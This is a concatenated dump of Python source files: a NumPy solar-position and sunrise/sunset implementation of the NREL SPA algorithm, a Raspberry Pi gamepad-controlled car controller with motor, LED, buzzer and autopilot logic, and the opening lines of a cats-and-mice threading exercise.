               for chunk in chunks]
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    return result
def solar_position_numpy(unixtime, lat, lon, elev, pressure, temp, delta_t,
                         atmos_refract, numthreads, sst=False, esd=False):
    """Calculate the solar position assuming unixtime is a numpy array. Note
    this function will not work if the solar position functions were
    compiled with numba.

    Mirrors solar_position_loop, but vectorized: each step evaluates the
    whole time array at once. `numthreads` is accepted for interface parity
    with solar_position_numba and is unused here.
    """
    # time scales: Julian day/century/millennium on UT and ephemeris time
    jd = julian_day(unixtime)
    jde = julian_ephemeris_day(jd, delta_t)
    jc = julian_century(jd)
    jce = julian_ephemeris_century(jde)
    jme = julian_ephemeris_millennium(jce)
    R = heliocentric_radius_vector(jme)
    if esd:
        # caller only wants the earth-sun distance
        return (R, )
    L = heliocentric_longitude(jme)
    B = heliocentric_latitude(jme)
    Theta = geocentric_longitude(L)
    beta = geocentric_latitude(B)
    # five fundamental arguments feeding the nutation series
    x0 = mean_elongation(jce)
    x1 = mean_anomaly_sun(jce)
    x2 = mean_anomaly_moon(jce)
    x3 = moon_argument_latitude(jce)
    x4 = moon_ascending_longitude(jce)
    delta_psi = longitude_nutation(jce, x0, x1, x2, x3, x4)
    delta_epsilon = obliquity_nutation(jce, x0, x1, x2, x3, x4)
    epsilon0 = mean_ecliptic_obliquity(jme)
    epsilon = true_ecliptic_obliquity(epsilon0, delta_epsilon)
    delta_tau = aberration_correction(R)
    lamd = apparent_sun_longitude(Theta, delta_psi, delta_tau)
    v0 = mean_sidereal_time(jd, jc)
    v = apparent_sidereal_time(v0, delta_psi, epsilon)
    alpha = geocentric_sun_right_ascension(lamd, epsilon, beta)
    delta = geocentric_sun_declination(lamd, epsilon, beta)
    if sst:
        # sunrise/sunset/transit callers only need these three values
        return v, alpha, delta
    m = sun_mean_longitude(jme)
    eot = equation_of_time(m, alpha, delta_psi, epsilon)
    H = local_hour_angle(v, lon, alpha)
    xi = equatorial_horizontal_parallax(R)
    # parallax corrections for the observer's position on the geoid
    u = uterm(lat)
    x = xterm(u, lat, elev)
    y = yterm(u, lat, elev)
    delta_alpha = parallax_sun_right_ascension(x, xi, H, delta)
    delta_prime = topocentric_sun_declination(delta, x, y, xi, delta_alpha, H)
    H_prime = topocentric_local_hour_angle(H, delta_alpha)
    e0 = topocentric_elevation_angle_without_atmosphere(lat, delta_prime,
                                                        H_prime)
    delta_e = atmospheric_refraction_correction(pressure, temp, e0,
                                                atmos_refract)
    e = topocentric_elevation_angle(e0, delta_e)
    theta = topocentric_zenith_angle(e)
    theta0 = topocentric_zenith_angle(e0)
    gamma = topocentric_astronomers_azimuth(H_prime, delta_prime, lat)
    phi = topocentric_azimuth_angle(gamma)
    # (apparent zenith, zenith, apparent elevation, elevation, azimuth, eot)
    return theta, theta0, e, e0, phi, eot
def solar_position(unixtime, lat, lon, elev, pressure, temp, delta_t,
                   atmos_refract, numthreads=8, sst=False, esd=False):
    """
    Calculate the solar position using the NREL SPA algorithm described
    in [1]. If numba is installed the compiled implementation runs (fast);
    otherwise the pure-numpy implementation evaluates the same equations.

    Parameters
    ----------
    unixtime : numpy array
        Array of unix/epoch timestamps to calculate solar position for.
        Unixtime is the number of seconds since Jan. 1, 1970 00:00:00 UTC.
        A pandas.DatetimeIndex is easily converted using .astype(np.int64)/10**9
    lat : float
        Latitude to calculate solar position for
    lon : float
        Longitude to calculate solar position for
    elev : float
        Elevation of location in meters
    pressure : int or float
        avg. yearly pressure at location in millibars;
        used for atmospheric correction
    temp : int or float
        avg. yearly temperature at location in
        degrees C; used for atmospheric correction
    delta_t : float, optional
        Difference between terrestrial time and UT1.
        *Note: delta_t = None will break code using nrel_numba,
        this will be fixed in a future version.
    atmos_refract : float, optional
        The approximate atmospheric refraction (in degrees)
        at sunrise and sunset.
    numthreads : int, optional, default 8
        Number of threads to use for computation if numba>=0.17
        is installed.
    sst : bool, default False
        If True, return only data needed for sunrise, sunset, and transit
        calculations.
    esd : bool, default False
        If True, return only Earth-Sun distance in AU

    Returns
    -------
    Numpy Array with elements:
        apparent zenith,
        zenith,
        elevation,
        apparent_elevation,
        azimuth,
        equation_of_time

    References
    ----------
    [1] I. Reda and A. Andreas, Solar position algorithm for solar radiation
    applications. Solar Energy, vol. 76, no. 5, pp. 577-589, 2004.

    [2] I. Reda and A. Andreas, Corrigendum to Solar position algorithm for
    solar radiation applications. Solar Energy, vol. 81, no. 6, p. 838, 2007.
    """
    do_calc = solar_position_numba if USE_NUMBA else solar_position_numpy
    result = do_calc(unixtime, lat, lon, elev, pressure,
                     temp, delta_t, atmos_refract, numthreads,
                     sst, esd)
    # The numpy path returns a tuple; convert to an ndarray best-effort.
    if not isinstance(result, np.ndarray):
        try:
            result = np.array(result)
        except Exception:
            pass
    return result
def transit_sunrise_sunset(dates, lat, lon, delta_t, numthreads):
    """
    Calculate the sun transit, sunrise, and sunset
    for a set of dates at a given location.

    Parameters
    ----------
    dates : array
        Numpy array of ints/floats corresponding to the Unix time
        for the dates of interest, must be midnight UTC (00:00+00:00)
        on the day of interest.
    lat : float
        Latitude of location to perform calculation for
    lon : float
        Longitude of location
    delta_t : float
        Difference between terrestrial time and UT. USNO has tables.
    numthreads : int
        Number to threads to use for calculation (if using numba)

    Returns
    -------
    tuple : (transit, sunrise, sunset) localized to UTC
    """
    if ((dates % 86400) != 0.0).any():
        raise ValueError('Input dates must be at 00:00 UTC')
    utday = (dates // 86400) * 86400
    # ephemeris-time day of interest plus the days before and after,
    # used below to interpolate right ascension / declination
    ttday0 = utday - delta_t
    ttdayn1 = ttday0 - 86400
    ttdayp1 = ttday0 + 86400
    # index 0 is v, 1 is alpha, 2 is delta
    utday_res = solar_position(utday, 0, 0, 0, 0, 0, delta_t,
                               0, numthreads, sst=True)
    v = utday_res[0]

    ttday0_res = solar_position(ttday0, 0, 0, 0, 0, 0, delta_t,
                                0, numthreads, sst=True)
    ttdayn1_res = solar_position(ttdayn1, 0, 0, 0, 0, 0, delta_t,
                                 0, numthreads, sst=True)
    ttdayp1_res = solar_position(ttdayp1, 0, 0, 0, 0, 0, delta_t,
                                 0, numthreads, sst=True)
    # m0: approximate transit time as a fraction of the day
    m0 = (ttday0_res[1] - lon - v) / 360
    # hour angle where the sun's centre is at -0.8333 degrees elevation
    # (standard sunrise/sunset definition used by the SPA)
    cos_arg = ((np.sin(np.radians(-0.8333)) - np.sin(np.radians(lat))
               * np.sin(np.radians(ttday0_res[2]))) /
               (np.cos(np.radians(lat)) * np.cos(np.radians(ttday0_res[2]))))
    cos_arg[abs(cos_arg) > 1] = np.nan  # polar day/night: no rise/set
    H0 = np.degrees(np.arccos(cos_arg)) % 180

    # m[0]=transit, m[1]=sunrise, m[2]=sunset as fractions of the day
    m = np.empty((3, len(utday)))
    m[0] = m0 % 1
    m[1] = (m[0] - H0 / 360)
    m[2] = (m[0] + H0 / 360)

    # need to account for fractions of day that may be the next or previous
    # day in UTC
    add_a_day = m[2] >= 1
    sub_a_day = m[1] < 0
    m[1] = m[1] % 1
    m[2] = m[2] % 1
    vs = v + 360.985647 * m
    n = m + delta_t / 86400
    # first differences of alpha (a, b) and delta (ap, bp) across the three
    # days, wrapped where they straddle a 360-degree discontinuity
    a = ttday0_res[1] - ttdayn1_res[1]
    a[abs(a) > 2] = a[abs(a) > 2] % 1
    ap = ttday0_res[2] - ttdayn1_res[2]
    ap[abs(ap) > 2] = ap[abs(ap) > 2] % 1
    b = ttdayp1_res[1] - ttday0_res[1]
    b[abs(b) > 2] = b[abs(b) > 2] % 1
    bp = ttdayp1_res[2] - ttday0_res[2]
    bp[abs(bp) > 2] = bp[abs(bp) > 2] % 1
    c = b - a
    cp = bp - ap

    # quadratic interpolation of right ascension / declination at each event
    alpha_prime = ttday0_res[1] + (n * (a + b + c * n)) / 2
    delta_prime = ttday0_res[2] + (n * (ap + bp + cp * n)) / 2
    Hp = (vs + lon - alpha_prime) % 360
    Hp[Hp >= 180] = Hp[Hp >= 180] - 360

    h = np.degrees(np.arcsin(np.sin(np.radians(lat)) *
                   np.sin(np.radians(delta_prime)) +
                   np.cos(np.radians(lat)) *
                   np.cos(np.radians(delta_prime))
                   * np.cos(np.radians(Hp))))

    # refine event fractions of the day, then convert to seconds
    T = (m[0] - Hp[0] / 360) * 86400
    R = (m[1] + (h[1] + 0.8333) / (360 * np.cos(np.radians(delta_prime[1])) *
                                   np.cos(np.radians(lat)) *
                                   np.sin(np.radians(Hp[1])))) * 86400
    S = (m[2] + (h[2] + 0.8333) / (360 * np.cos(np.radians(delta_prime[2])) *
                                   np.cos(np.radians(lat)) *
                                   np.sin(np.radians(Hp[2])))) * 86400

    S[add_a_day] += 86400
    R[sub_a_day] -= 86400

    transit = T + utday
    sunrise = R + utday
    sunset = S + utday

    return transit, sunrise, sunset
def earthsun_distance(unixtime, delta_t, numthreads):
    """
    Calculates the distance from the earth to the sun using the
    NREL SPA algorithm described in [1].

    Parameters
    ----------
    unixtime : numpy array
        Array of unix/epoch timestamps to calculate solar position for.
        Unixtime is the number of seconds since Jan. 1, 1970 00:00:00 UTC.
        A pandas.DatetimeIndex is easily converted using .astype(np.int64)/10**9
    delta_t : float
        Difference between terrestrial time and UT. USNO has tables.
    numthreads : int
        Number to threads to use for calculation (if using numba)

    Returns
    -------
    R : array
        Earth-Sun distance in AU.

    References
    ----------
    [1] Reda, I., Andreas, A., 2003. Solar position algorithm for solar
    radiation applications. Technical report: NREL/TP-560- 34302. Golden,
    USA, http://www.nrel.gov.
    """
    # esd=True makes solar_position return only the radius vector row
    esd_result = solar_position(unixtime, 0, 0, 0, 0, 0, delta_t,
                                0, numthreads, esd=True)
    return esd_result[0]
def calculate_deltat(year, month):
    """Calculate the difference between Terrestrial Dynamical Time (TD)
    and Universal Time (UT).

    Note: This function is not yet compatible for calculations using
    Numba.

    Equations taken from http://eclipse.gsfc.nasa.gov/SEcat5/deltatpoly.html

    Accepts scalars or numpy arrays; returns a scalar when both inputs
    are scalar, otherwise an array.
    """
    plw = 'Deltat is unknown for years before -1999 and after 3000. ' \
          'Delta values will be calculated, but the calculations ' \
          'are not intended to be used for these years.'

    # np.any raises ValueError on scalars in some numpy versions; the
    # scalar comparison in the except handles that. TypeError (e.g. a
    # non-numeric year) falls back to a delta of 0.
    try:
        if np.any((year > 3000) | (year < -1999)):
            warnings.warn(plw)
    except ValueError:
        if (year > 3000) | (year < -1999):
            warnings.warn(plw)
    except TypeError:
        return 0

    # decimal year, using the middle of the given month
    y = year + (month - 0.5)/12

    # piecewise polynomial fits, one era per np.where clause
    deltat = np.where(year < -500,

                      -20+32*((y-1820)/100)**2, 0)

    deltat = np.where((-500 <= year) & (year < 500),

                      10583.6-1014.41*(y/100)
                      + 33.78311*(y/100)**2
                      - 5.952053*(y/100)**3
                      - 0.1798452*(y/100)**4
                      + 0.022174192*(y/100)**5
                      + 0.0090316521*(y/100)**6, deltat)

    deltat = np.where((500 <= year) & (year < 1600),

                      1574.2-556.01*((y-1000)/100)
                      + 71.23472*((y-1000)/100)**2
                      + 0.319781*((y-1000)/100)**3
                      - 0.8503463*((y-1000)/100)**4
                      - 0.005050998*((y-1000)/100)**5
                      + 0.0083572073*((y-1000)/100)**6, deltat)

    deltat = np.where((1600 <= year) & (year < 1700),

                      120-0.9808*(y-1600)
                      - 0.01532*(y-1600)**2
                      + (y-1600)**3/7129, deltat)

    deltat = np.where((1700 <= year) & (year < 1800),

                      8.83+0.1603*(y-1700)
                      - 0.0059285*(y-1700)**2
                      + 0.00013336*(y-1700)**3
                      - (y-1700)**4/1174000, deltat)

    deltat = np.where((1800 <= year) & (year < 1860),

                      13.72-0.332447*(y-1800)
                      + 0.0068612*(y-1800)**2
                      + 0.0041116*(y-1800)**3
                      - 0.00037436*(y-1800)**4
                      + 0.0000121272*(y-1800)**5
                      - 0.0000001699*(y-1800)**6
                      + 0.000000000875*(y-1800)**7, deltat)

    deltat = np.where((1860 <= year) & (year < 1900),

                      7.62+0.5737*(y-1860)
                      - 0.251754*(y-1860)**2
                      + 0.01680668*(y-1860)**3
                      - 0.0004473624*(y-1860)**4
                      + (y-1860)**5/233174, deltat)

    deltat = np.where((1900 <= year) & (year < 1920),

                      -2.79+1.494119*(y-1900)
                      - 0.0598939*(y-1900)**2
                      + 0.0061966*(y-1900)**3
                      - 0.000197*(y-1900)**4, deltat)

    deltat = np.where((1920 <= year) & (year < 1941),

                      21.20+0.84493*(y-1920)
                      - 0.076100*(y-1920)**2
                      + 0.0020936*(y-1920)**3, deltat)

    deltat = np.where((1941 <= year) & (year < 1961),

                      29.07+0.407*(y-1950)
                      - (y-1950)**2/233
                      + (y-1950)**3/2547, deltat)

    deltat = np.where((1961 <= year) & (year < 1986),

                      45.45+1.067*(y-1975)
                      - (y-1975)**2/260
                      - (y-1975)**3/718, deltat)

    deltat = np.where((1986 <= year) & (year < 2005),

                      63.86+0.3345*(y-2000)
                      - 0.060374*(y-2000)**2
                      + 0.0017275*(y-2000)**3
                      + 0.000651814*(y-2000)**4
                      + 0.00002373599*(y-2000)**5, deltat)

    deltat = np.where((2005 <= year) & (year < 2050),

                      62.92+0.32217*(y-2000)
                      + 0.005589*(y-2000)**2, deltat)

    deltat = np.where((2050 <= year) & (year < 2150),

                      -20+32*((y-1820)/100)**2
                      - 0.5628*(2150-y), deltat)

    deltat = np.where(year >= 2150,

                      -20+32*((y-1820)/100)**2, deltat)

    # collapse the 0-d array back to a Python scalar for scalar inputs
    deltat = deltat.item() if np.isscalar(year) & np.isscalar(month)\
        else deltat

    return deltat
|
controller.py
|
# LD_PRELOAD=/usr/lib/arm-linux-gnueabihf/libatomic.so.1.2.0 python3 controls.py
import RPi.GPIO as GPIO
import time
import prefs
import os
import errno
import shutil
import threading
import sys
#import cv2
#import numpy as np
def log(*a):
    """No-op debug logger; re-enable the print below for console output."""
    # print("[CONT]", a)
    return None
#import sys
#sys.path.append("../self_drive")
#import drive
# Autopilot starts disabled; toggled from the gamepad in main().
AUTOPILOT = False
sys.path.append("../self_drive")
import image_processing
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
# Forward / Backward motor driver pins (H-bridge inputs + PWM enable)
in1 = 27
in2 = 17
en = 22
temp1=1
# Left / Right (steering) motor driver pins
tin1 = 23
tin2 = 24
ten = 25
steering_angle = 75
GPIO.setup(in1,GPIO.OUT)
GPIO.setup(in2,GPIO.OUT)
GPIO.setup(en,GPIO.OUT)
GPIO.output(in1,GPIO.LOW)
GPIO.output(in2,GPIO.LOW)
# 1 kHz PWM on the drive-motor enable pin; duty cycle set by set_accel()
p=GPIO.PWM(en,1000)
p.start(0)
GPIO.setup(tin1,GPIO.OUT)
GPIO.setup(tin2,GPIO.OUT)
GPIO.setup(ten,GPIO.OUT)
GPIO.output(tin1,GPIO.LOW)
GPIO.output(tin2,GPIO.LOW)
# 1 kHz PWM on the steering-motor enable pin; duty set by set_steering()
tp=GPIO.PWM(ten,1000)
tp.start(0)
"""
# GPIO Pins don't provide enough current to drive Fan
FAN_PIN = 12
GPIO.setup(FAN_PIN,GPIO.OUT)
GPIO.output(FAN_PIN,GPIO.HIGH)
"""
# NOTE(review): BUZZER_PIN reuses pin 12 from the disabled fan block above.
BUZZER_PIN = 12
GPIO.setup(BUZZER_PIN,GPIO.OUT)
GPIO.output(BUZZER_PIN, GPIO.LOW)
def BACKGROUND_BUZZER_PATTERN(pattern_total, delay_time=0.5):
    """Play a buzzer pattern synchronously: any non-space character beeps
    for delay_time seconds, a space is silence; buzzer is left off."""
    for step in pattern_total:
        GPIO.output(BUZZER_PIN, GPIO.LOW)
        if str(step) != " ":
            GPIO.output(BUZZER_PIN, GPIO.HIGH)
        time.sleep(delay_time)
    GPIO.output(BUZZER_PIN, GPIO.LOW)
# TODO : Play out complex buzzer patterns async
def BUZZER_PATTERN(pattern_total, delay_time=0.5):
    """Fire-and-forget: play a buzzer pattern on a background thread."""
    worker = threading.Thread(target=BACKGROUND_BUZZER_PATTERN,
                              args=(pattern_total, delay_time))
    worker.start()
# Power-on beep followed by a short confirmation pattern.
GPIO.output(BUZZER_PIN,GPIO.HIGH)
BUZZER_PATTERN("b", 0.1)
# RGB status LED pins
RED_PIN = 10
GREEN_PIN = 11
BLUE_PIN = 9
GPIO.setup(RED_PIN,GPIO.OUT)
GPIO.setup(GREEN_PIN,GPIO.OUT)
GPIO.setup(BLUE_PIN,GPIO.OUT)
def BACKGROUND_LED_PATTERN(pattern_total, delay_time=0.5):
    """Play an RGB LED pattern synchronously.

    Each character of pattern_total selects the lit colour for one step:
    'R', 'G', 'B', or ' ' for all off. The wiring appears active-low
    (LOW lights a colour, HIGH turns it off) — verify against hardware.
    A trailing '_' latches the second-to-last colour on after the pattern
    finishes; otherwise all LEDs end up off.
    """
    # start from all-off
    GPIO.output(RED_PIN,GPIO.HIGH)
    GPIO.output(GREEN_PIN,GPIO.HIGH)
    GPIO.output(BLUE_PIN,GPIO.HIGH)
    for pattern in pattern_total:
        # reset, then light only the requested colour for this step
        GPIO.output(RED_PIN,GPIO.HIGH)
        GPIO.output(GREEN_PIN,GPIO.HIGH)
        GPIO.output(BLUE_PIN,GPIO.HIGH)
        if "R" == str(pattern):
            GPIO.output(RED_PIN,GPIO.LOW)
        elif "G" == str(pattern):
            GPIO.output(GREEN_PIN,GPIO.LOW)
        elif "B" == str(pattern):
            GPIO.output(BLUE_PIN,GPIO.LOW)
        elif " " == str(pattern):
            pass # All blank
        time.sleep(delay_time)
    GPIO.output(RED_PIN,GPIO.HIGH)
    GPIO.output(GREEN_PIN,GPIO.HIGH)
    GPIO.output(BLUE_PIN,GPIO.HIGH)
    if (str(pattern_total).endswith("_")):
        # '_' suffix: leave the colour before it switched on
        pattern = pattern_total[len(pattern_total)-2]
        if "R" == str(pattern):
            GPIO.output(RED_PIN,GPIO.LOW)
        elif "G" == str(pattern):
            GPIO.output(GREEN_PIN,GPIO.LOW)
        elif "B" == str(pattern):
            GPIO.output(BLUE_PIN,GPIO.LOW)
        elif " " == str(pattern):
            pass # All blank
# TODO : Play out complex LED patterns async
def LED_PATTERN(pattern_total, delay_time=0.5):
    """Fire-and-forget: play an LED pattern on a background thread."""
    worker = threading.Thread(target=BACKGROUND_LED_PATTERN,
                              args=(pattern_total, delay_time))
    worker.start()
def connect_bluetooth_loop():
    """Block until the gamepad pairs, retrying the connect script every 10 s.

    Beeps on entry, blinks blue while retrying, and signals success with a
    beep plus a blue/green pattern that latches green.
    """
    BUZZER_PATTERN("b b", 0.1)
    while not bluetooth_connected():
        LED_PATTERN("B B B B B_", 0.25)
        os.system('./bluetooth_connect.sh')
        time.sleep(10)
    BUZZER_PATTERN("b b", 0.1)
    LED_PATTERN("B B G G G G G_", 0.25)
def bluetooth_connected():
    """True when the paired controller exposes its input device node."""
    return "event0" in os.listdir("/dev/input/")
# Ensure the gamepad is paired before the control loop starts.
if not bluetooth_connected():
    connect_bluetooth_loop()
# NOTE(review): 'global' at module scope is a no-op; kept as-is.
global tank_controls
tank_controls = False;
def set_accel(accel_val):
    """Drive motor: sign of accel_val picks direction (positive = forward),
    magnitude (expected 0-100) sets the PWM duty cycle."""
    if accel_val > 0:
        # forward
        GPIO.output(in1, GPIO.HIGH)
        GPIO.output(in2, GPIO.LOW)
    else:
        # reverse (also the resting state for accel_val == 0)
        GPIO.output(in1, GPIO.LOW)
        GPIO.output(in2, GPIO.HIGH)
    p.ChangeDutyCycle(abs(accel_val))
# Last emitted telemetry string; used by tank_mover to de-duplicate logs.
# NOTE(review): 'global' at module scope is a no-op; kept as-is.
global last_out
last_out = ""
def tank_mover(steering_angle, accel_val):
    """Skid-steer ("tank") drive: both motors propel, speed differential
    turns the vehicle.

    steering_angle is expected in [-1, 1] and accel_val in [-100, 100]
    (the ranges produced by corrected_reading / main). With accel_val == 0
    the two motors spin in opposite directions to rotate in place.

    NOTE(review): the forward pin polarity here (in1 LOW / in2 HIGH) is the
    opposite of set_accel's — presumably intentional for the tank wiring;
    confirm against the hardware.
    """
    global last_out
    out = "[TANK] "
    if accel_val>0:
        # Forward
        GPIO.output(in1,GPIO.LOW)
        GPIO.output(in2,GPIO.HIGH)
        GPIO.output(tin1,GPIO.HIGH)
        GPIO.output(tin2,GPIO.LOW)
    elif accel_val<0:
        # Backwards
        GPIO.output(in1,GPIO.HIGH)
        GPIO.output(in2,GPIO.LOW)
        GPIO.output(tin1,GPIO.LOW)
        GPIO.output(tin2,GPIO.HIGH)
    else:
        # No throttle: rotate in place, direction from the steering sign.
        if steering_angle>0:
            # Pure Left
            GPIO.output(in1,GPIO.LOW)
            GPIO.output(in2,GPIO.HIGH)
            GPIO.output(tin1,GPIO.LOW)
            GPIO.output(tin2,GPIO.HIGH)
        else:
            # Pure Right
            GPIO.output(in1,GPIO.HIGH)
            GPIO.output(in2,GPIO.LOW)
            GPIO.output(tin1,GPIO.HIGH)
            GPIO.output(tin2,GPIO.LOW)
        # both tracks at |steering| * 100 percent duty
        p.ChangeDutyCycle(abs(steering_angle * 100))
        tp.ChangeDutyCycle(abs(steering_angle * 100))
        out = "p" + str(abs(steering_angle)) + "; tp" + str(abs(steering_angle))
        if out!=last_out:
            #log(out)
            last_out = out
        return
    # Moving: blend throttle across the two tracks. tf in [0, 2] maps the
    # steering to a per-track duty-cycle split.
    tf = (steering_angle + 1)
    p.ChangeDutyCycle(abs(accel_val * tf/2.0))
    tp.ChangeDutyCycle(abs(accel_val * (1 - abs(tf)/2.0) * 2))
    out = "p" + str(abs(accel_val * tf)) + "; tp" + str(abs(accel_val * (1 - abs(tf))))
    if out!=last_out:
        #log(out)
        last_out = out
def set_steering(steering_angle, accel_val=0):
    """Steering motor: sign picks the turn direction (input is negated to
    match the wiring), magnitude in [0, 1] sets the PWM duty (x100).
    accel_val is accepted for interface parity and unused."""
    flipped = steering_angle * -1
    if flipped > 0:
        # left
        GPIO.output(tin1, GPIO.HIGH)
        GPIO.output(tin2, GPIO.LOW)
    else:
        # right
        GPIO.output(tin1, GPIO.LOW)
        GPIO.output(tin2, GPIO.HIGH)
    tp.ChangeDutyCycle(abs(flipped) * 100)
# Most recent telemetry, shared between main() and the autopilot thread.
LAST_DATA = dict()
def autopilot_loop():
    """Background thread: while AUTOPILOT is on, replay the newest
    accel/steering commands published via prefs into loop().

    Commands older than 0.5 s are treated as stale and ignored. The thread
    never exits; every iteration is best-effort.
    """
    global LAST_DATA
    while True:
        try:
            if AUTOPILOT:
                prefs.set_pref("AUTOPILOT", "1")
                now = time.time()
                accel_val = 0
                steering_angle = 0
                # BUG FIX: the bare `except:` clauses below were narrowed to
                # `except Exception:` so KeyboardInterrupt/SystemExit still
                # propagate and the process can shut down.
                try:
                    accel_val = float(prefs.get_pref("accel_val_auto"))
                except Exception:
                    log("accel_val_auto error")
                try:
                    steering_angle = float(prefs.get_pref("steering_angle_auto"))
                except Exception:
                    log("steering_angle_auto error")
                #accel_val, steering_angle = drive.telemetry(LAST_DATA, recorder.CURRENT_FRAME)
                # only act on commands published within the last 0.5 s
                if abs(prefs.get_pref_time("accel_val_auto") - now) <= 0.5 or abs(prefs.get_pref_time("steering_angle_auto") - now) <= 0.5:
                    loop(accel_val, steering_angle)
                    LAST_DATA["accel_val"] = accel_val
                    LAST_DATA["steering_angle"] = steering_angle
                    LAST_DATA["speed"] = prefs.get_pref("speed") #chase_value(accel_val, LAST_DATA["speed"], 0.25)
                    #prefs.set_pref("speed", LAST_DATA["speed"])
            else:
                prefs.set_pref("AUTOPILOT", "0")
            time.sleep(0.1)
        except Exception as e:
            # best-effort loop: one bad iteration must not kill the thread
            log("AUTOPILOT - ", e)
# Start the autopilot relay thread alongside the manual control loop.
AUTOPILOT_thread = threading.Thread(target=autopilot_loop)
AUTOPILOT_thread.start()
# PICS steering_angle speed throttle brakes
def loop(accel_val, steering_angle, rec_toggle=False):
    """Apply one control command: optionally toggle recording, publish the
    command to prefs, then drive the motors (tank or car steering)."""
    global tank_controls
    if rec_toggle:
        # rec pref holds "0" when off, else the start timestamp
        if prefs.get_pref("rec") == "0":
            BUZZER_PATTERN("b b b", 0.3)
            LED_PATTERN("R R_")
            log("Rec ON")
            prefs.set_pref("rec", str(time.time()))
        else:
            BUZZER_PATTERN("b", 1)
            LED_PATTERN("R R")
            log("Rec OFF")
            prefs.set_pref("rec", "0")
    # read for parity with the (disabled) telemetry logging below
    speed = prefs.get_pref("speed")
    if AUTOPILOT:
        #log("accel_val", round(accel_val, 3), "steering_angle", round(steering_angle, 3), "speed", speed, "[AUTOPilot]")
        pass
    else:
        #log("accel_val", round(accel_val, 3), "steering_angle", round(steering_angle, 3), "speed", speed, "[MANUAL]")
        pass
    # publish the command so other processes (recorder, web UI) can see it
    prefs.set_pref("accel_val", str(accel_val))
    prefs.set_pref("steering_angle", str(steering_angle))
    if tank_controls:
        tank_mover(steering_angle, accel_val)
    else:
        set_accel(accel_val)
        set_steering(steering_angle)
# Chase factor is below 1; larger values chase the goal more aggressively.
def chase_value(goal, chase, chase_factor=0.5):
    """Move `chase` a fraction (chase_factor) of the way toward `goal`."""
    delta = goal - chase
    return chase + delta * chase_factor
def corrected_reading(val):
    """Map a raw 16-bit axis reading (centre 32767) onto [-1, 1], inverted
    so that low raw values are positive; rounded to 4 decimal places."""
    scaled = -1 * (val - 32767) / 32767
    clamped = max(-1, min(1, scaled))
    return round(clamped, 4)
#import recorder
#CAMERA_thread = threading.Thread(target=recorder.start_camera_loop)
#CAMERA_thread.start()
from evdev import InputDevice, categorize, ecodes
# 'gamepad' wraps the paired Bluetooth controller's input device node.
# TODO : Web interface to pair new device
gamepad = InputDevice('/dev/input/event0')
# log device info at start
log(gamepad)
# Timestamp of a pending long-press shutdown request (0 = none pending).
shutdown_request = 0
def main():
    """Translate gamepad events into drive commands, forever.

    Event map (event.type 3 = absolute axes, D-pad included):
      code 16, value -1 : autopilot on        code 16, value 1 : record toggle
      code 16, value  0 : release / autopilot off
      code 17, value  1 : compile model       code 17, value -1: shutdown (hold 2 s)
      code  1 : accel axis                    code  2 : steering axis
      codes 304/305/307/308 (A/B/X/Y) : speed cap 25/50/75/100

    If the device disappears the inner loop raises; the outer loop logs it
    and reopens the read loop.
    """
    global shutdown_request, AUTOPILOT, LAST_DATA
    FIRST_COMMAND = True
    while True:
        try:
            LAST_DATA["accel_val"] = 0       # 0 to 100
            LAST_DATA["steering_angle"] = 0  # 0 to 1
            LAST_DATA["speed"] = 0           # 0 to 100
            accel_val = 0
            steering_angle = 0
            SPEED_MODE = 1
            # BUG FIX: rec_toggle was previously assigned only inside the
            # D-pad branches, so the loop(...) call below raised NameError
            # (silently swallowed by the except, restarting the read loop)
            # until such an event arrived. Initialize it up front.
            rec_toggle = False
            for event in gamepad.read_loop():
                if FIRST_COMMAND:
                    # audible confirmation that the controller is live
                    BUZZER_PATTERN("b b", 0.1)
                    FIRST_COMMAND = False
                if event.code == 16 and event.value == -1 and event.type == 3:
                    AUTOPILOT = True
                    BUZZER_PATTERN("b b b", 0.1)
                    LED_PATTERN("B B_")
                if event.code == 16 and event.value == 0 and event.type == 3:
                    if AUTOPILOT:
                        AUTOPILOT = False
                        BUZZER_PATTERN("b b b", 0.1)
                        LED_PATTERN("G")
                    rec_toggle = False
                if event.code == 16 and event.value == 1 and event.type == 3:
                    rec_toggle = True
                if event.code == 17 and event.value == 1 and event.type == 3:
                    log("Compile event triggered")
                    BUZZER_PATTERN("b b", 0.1)
                    # refuse to compile while a recording is in progress
                    if prefs.get_pref("rec") == "0":
                        LED_PATTERN("B B")
                        os.system('python3 compile.py > logs/compile.txt &')
                    else:
                        LED_PATTERN("R R_", 0.25)
                        log("Did not fire compile [currently recording]")
                now = time.time()
                if event.code == 17 and event.value == -1 and event.type == 3:
                    if shutdown_request == 0:
                        log("Shutdown request triggered")
                        shutdown_request = now
                        LED_PATTERN("RB"*4, 0.25)
                if event.code == 17 and event.value == 0 and event.type == 3:
                    # releasing within 2 s cancels the shutdown request
                    if now - shutdown_request < 2 and shutdown_request != 0:
                        log("Shutdown request dropped")
                        LED_PATTERN("G_")
                        shutdown_request = 0
                if shutdown_request != 0:
                    if now - shutdown_request >= 2:  # held 2+ seconds
                        log("SHUTDOWN SIGNAL")
                        LED_PATTERN("R_")
                        BUZZER_PATTERN("b b b b b", 0.1)
                        time.sleep(0.5)
                        os.system("halt")
                if event.type != 0:
                    # axis / button payloads
                    if event.code == 1:
                        accel_val = corrected_reading(event.value) * 100
                    elif event.code == 2:
                        steering_angle = corrected_reading(event.value)
                    elif event.code == 304:  # A
                        SPEED_MODE = 1
                    elif event.code == 305:  # B
                        SPEED_MODE = 2
                    elif event.code == 307:  # X
                        SPEED_MODE = 3
                    elif event.code == 308:  # Y
                        SPEED_MODE = 4
                # clamp acceleration to the current speed cap, keeping sign
                if abs(accel_val) > 25*SPEED_MODE:
                    if accel_val != 0:  # avoid divide-by-zero on sign extraction
                        accel_val = 25*SPEED_MODE * accel_val / abs(accel_val)
                    else:
                        accel_val = 25*SPEED_MODE
                loop(accel_val, steering_angle, rec_toggle)
                LAST_DATA["accel_val"] = accel_val
                LAST_DATA["steering_angle"] = steering_angle
        except Exception as e:
            log(e)
            if ("No such device" in str(e)):
                log("Bluetooth connection lost")
                # TODO : Reconnect to BT
# Script entry point: requires a paired gamepad and the GPIO wiring above.
if __name__ == "__main__":
    #from camera_pi import Camera
    #main(Camera)
    main()
|
cats_and_mice.py
|
# from time import sleep
from threading import Thread, Semaphore
from random import randint, choice
number_of_cats = 2
number_of_mice = 200
number_of_bowls = 15
# Shared state: ids of the animals currently inside the bowl zone.
mice_in_eating_zone = []
cats_in_eating_zone = []
# Binary semaphores acting as mutexes for the two lists above.
mice_in_eating_zone_access = Semaphore(1)
